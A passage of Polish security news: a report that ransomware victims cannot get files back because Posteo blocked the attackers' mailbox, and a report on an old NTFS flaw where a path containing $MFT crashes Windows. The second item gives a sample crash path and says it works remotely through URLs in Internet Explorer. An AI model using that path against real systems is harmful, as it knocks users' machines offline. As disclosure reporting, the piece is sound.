Do odszyfrowania pamięci konieczne jest zapłacenie równowartości 300 dolarów w bitcoinach, a następnie zgłoszenie wpłaty za pośrednictwem maila. Skrzynka atakujących hostowana jest przez niemieckiego dostawcę Posteo. Administracja usługi pocztowej zdecydowała się jednak zablokować dostęp do konta wykorzystywanego przez napastników.

A to oznacza, że nawet, jeśli ofiara zdecyduje się zapłacić okup, to pliki i tak nie zostaną odszyfrowane. Atakujący nie mają już bowiem dostępu do nadsyłanych mailem informacji, które pozwalają na identyfikację maszyn, których właściciele zdecydowali się na zapłacenie okupu.

Posteo uzasadnia swoją decyzję brakiem tolerancji dla używania ich usługi pocztowej w celach naruszających regulamin. Całkowicie pominęli oni fakt, że w ten sposób odebrali ofiarom jedyną możliwość nawiązania kontaktu z atakującym i odszyfrowania danych. W tej chwili możemy stwierdzić, że opłacenie okupu z całą pewnością nie poskutkuje odzyskaniem danych.

źródło: niebezpiecznik.pl , dobreprogramy.pl

Odkryto kolejną lukę, na którą odporny jest tylko Windows 10

Odkryto kolejną lukę, na którą odporny jest tylko Windows 10

Wygląda na to, że podatność rodem z lat 90′ została odkryta na nowo i stanowi zagrożenie dla wszystkich (prócz Windows 10) wspieranych wersji Windows. Metoda ataku jest trywialna i opiera się na błędzie z epoki Windows 9x, kiedy to systemy w specyficzny sposób traktowały nazwy nieodnoszące się do rzeczywistych plików. Jak to możliwe, że podatność jest nadal obecna?

Jeśli wierzyć raportom, wszystkiemu winny jest sterownik NTFS, a dokładniej mówiąc – sposób, w jaki postępuje ze specjalnymi nazwami plików, w tym przypadku z ciągiem znaków $MFT, który odnosi się do specjalnych metadanych używanych przez system plików NTFS. Plik jest domyślnie ukryty przed użytkownikami i większością oprogramowania. Kiedy jednak stanie się częścią ścieżki (np. C:\$MFT\123), Windows zablokuje plik i nigdy go nie wypuści, czyniąc system plików niedostępnym. Może to doprowadzić do wyświetlenia bluescreena i wymusić restart komputera.

Problem można wywołać lokalnie, ale także zdalnie, jeśli $MFT jest częścią adresu URL. Niektóre przeglądarki taki adres zablokują, jednak Internet Explorer najwyraźniej w pełni nieświadomie zapala zielone światło. Atak może więc nastąpić po załadowaniu spreparowanej strony, odebraniu wiadomości mailowej czy nawet po wyświetleniu złośliwej reklamy na zaufanej stronie. Microsoft został już poinformowany o podatności. Łatka dla Windows 7 i Windows 8.1 pojawi się prawdopodobnie 13 czerwca, czyli w najbliższy Patch Tuesday.

 

źródło: centrumxp.pl